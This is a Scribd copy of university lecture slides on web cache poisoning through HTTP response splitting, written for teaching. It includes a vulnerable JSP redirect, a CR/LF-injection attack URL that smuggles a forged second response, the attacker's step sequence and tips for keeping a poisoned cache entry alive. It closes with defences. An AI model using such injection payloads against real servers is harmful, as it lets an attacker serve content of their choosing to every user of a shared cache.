Scribd Logo
Încărcați

Bine ați venit la Scribd!

  • Cache Poisoning: Alexandra - Lacatus@info - Uaic.ro FCS Iasi, Software Security

    Încărcat de

    abaheabaheabahe
    28 vizualizări11 pagini
    This document discusses cache poisoning via web cache poisoning attacks. It begins by introducing the topic and defining web cache poisoning as allowing an attacker to place malicious content on a shared cache server that will be delivered to all users until the cache is purged. It then explains that these attacks work by exploiting vulnerabilities like HTTP response splitting. An example is provided of how response splitting can be used to inject malicious content. The document outlines the steps an attacker would take to perform a cache poisoning attack and considerations they would need to account for. It closes by providing recommendations for web developers and vendors to prevent these attacks.

    Descriere originală:

    Titlu original

    cachepoisoning-131128223254-phpapp02

    Drepturi de autor

    © © All Rights Reserved

    Formate disponibile

    PPT, PDF, TXT sau citiți online pe Scribd

    Vi se pare util acest document?

    Este necorespunzător acest conținut?

    Raportați acest document
    This document discusses cache poisoning via web cache poisoning attacks. It begins by introducing the topic and defining web cache poisoning as allowing an attacker to place malicious content on a shared cache server that will be delivered to all users until the cache is purged. It then explains that these attacks work by exploiting vulnerabilities like HTTP response splitting. An example is provided of how response splitting can be used to inject malicious content. The document outlines the steps an attacker would take to perform a cache poisoning attack and considerations they would need to account for. It closes by providing recommendations for web developers and vendors to prevent these attacks.

    Drepturi de autor:

    © All Rights Reserved
    Descărcați ca PPT, PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    28 vizualizări11 pagini

    Cache Poisoning: Alexandra - Lacatus@info - Uaic.ro FCS Iasi, Software Security

    Încărcat de

    abaheabaheabahe
    This document discusses cache poisoning via web cache poisoning attacks. It begins by introducing the topic and defining web cache poisoning as allowing an attacker to place malicious content on a shared cache server that will be delivered to all users until the cache is purged. It then explains that these attacks work by exploiting vulnerabilities like HTTP response splitting. An example is provided of how response splitting can be used to inject malicious content. The document outlines the steps an attacker would take to perform a cache poisoning attack and considerations they would need to account for. It closes by providing recommendations for web developers and vendors to prevent these attacks.

    Drepturi de autor:

    © All Rights Reserved
    Descărcați ca PPT, PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    din 11

    Cache Poisoning

    alexandra.lacatus@info.uaic.ro FCS Iasi, Software Security

    Overview

    Intro Web Cache poisoning Related Attacks

    About HTTP Response Splitting


    Attack scenario Practical considerations

    Software Security, FCS Iasi, 2013-2014

    About Web Cache poisoning


    Domain pioneered by Amit Klein, formerly

    Director of Security and Research at Sanctum, Inc. Allows an attacker to place malicious content on a shared cache server (such as an proxy server) All users of that cache will continue to receive the malicious content until the cache entry is purged.

    Software Security, FCS Iasi, 2013-2014

    Related attacks & vulnerabilities


    Web Cache poisoning is based on HTTP

    Response splitting. The attacker must find a web resource vulnerable to HTTP response Splitting and exploit that vulnerability. Cross-User Defacement is also possible via placing malicious web content for a specific user && stealing sensitive information

    Software Security, FCS Iasi, 2013-2014

    HTTP Response Splitting


    Forcing an originator of HTTP messages to emit 2

    (or more) valid (RFC-compliant) messages instead of one. The result of the applications failure to reject illegal user input (malicious/unexpected CR&LF characters may be found especially in Location and Set-Cookie headers)

    Software Security, FCS Iasi, 2013-2014

    Response Splitting Example [5]


    JSP page (say http://www.the.site/welcome.jsp?lang=...)

    <%

    response.sendRedirect(/by_lang.jsp?lang= + request.getParameter(lang)); %>

    Normal request:

    http://www.the.site/welcome.jsp?lang=Romanian
    Normal Response:

    HTTP/1.0 302 Redirect Location: http://www.the.site/by_lang.jsp?lang=Romanian Connection: Keep-Alive Content-Length: 0

    Software Security, FCS Iasi, 2013-2014

    Example continued [5]

    Attack request http://www.the.site/welcome.jsp?lang=Foo%0d%0aConnection:%20KeepAlive%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContentType:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>

    Response (actually, 2 responses and some change): HTTP/1.0 302 Redirect Location: http://www.the.site/by_lang.jsp?lang=Foo

    Will be interpreted as Response # 1

    Connection: Keep-Alive
    Content-Length: 0 HTTP/1.0 200 OK Content-Type: text/html Content-Length: 20 <html>Gotcha</html> Connection: Keep-Alive

    Will be interpreted as Response # 2 !!Injected by attacker!!

    Content-Length: 0
    7 Software Security, FCS Iasi, 2013-2014

    Superfluous data, does not conform to the HTTP Standard

    Cache Poisoning Attack


    Difficult to carry-out in real environment. (many

    conditions and pre-requisites)


    1) Find a web resource vulnerable to HTTP Response

    Splitting 2) Force the cache server to flush the actual cache content (Pragma: no-cache or Cache-Control) 3) Send a specially crafted request, as the previous 4) Send the next request (poisoned resource). The injected Response #2 will server as a response from Step #3 and will be stored by the shared web cache server
    8 Software Security, FCS Iasi, 2013-2014

    Attacker - Practical Aspects [4]


    Maintain the poisoned resource
    Last-Modified header with a future time value
    Send the cache poisoning attack every x minutes?

    Execute all requests immediately one after

    another Take into account the URI length (GET / POST) Attack scenario depends to the web server implementation (Microsoft ASP, Jakarta Tomcat, IBM WebSphere etc.):
    Where the second message starts?
    9 Software Security, FCS Iasi, 2013-2014

    Victims Practical Aspects [4]


    Web Application Developers
    VALIDATE INPUT!! Remove CRs and LFs before

    embedding data to HTTP response headers (Location and Set-Cookie especially)


    Web application engine vendors
    Disallow CR & LF characters in all HTTP response

    headers (requirement for RFC 2616)


    Proxy vendors
    Avoid sharing server TCP connection among

    different clients / virtual hosts


    10 Software Security, FCS Iasi, 2013-2014

    Bibliography
    1)

    OWASP page for Web cache poisoning


    https://www.owasp.org/index.php/Cache_Poisoning

    2)
    3)

    OWASP page for HTTP Response Splitting


    https://www.owasp.org/index.php/HTTP_Response_Splitting

    OWASP Testing guide v3 (section 4.8.15, Testing for HTTP Splitting/Smuggling, pages 278-281) 4) Amit Klein, Http Response Splitting, Web Cache Poisoning Attacks and Related Topics 5) Amit Klein, HTTP Message Splitting, Smuggling and Other Animals, OWASP AppSec Europe, 2006 6) China's Great Firewall spreads overseas
    http://www.computerworld.com/s/article/9174132/China_s_Great_Fi rewall_spreads_overseas

    11

    Software Security, FCS Iasi, 2013-2014

    S-ar putea să vă placă și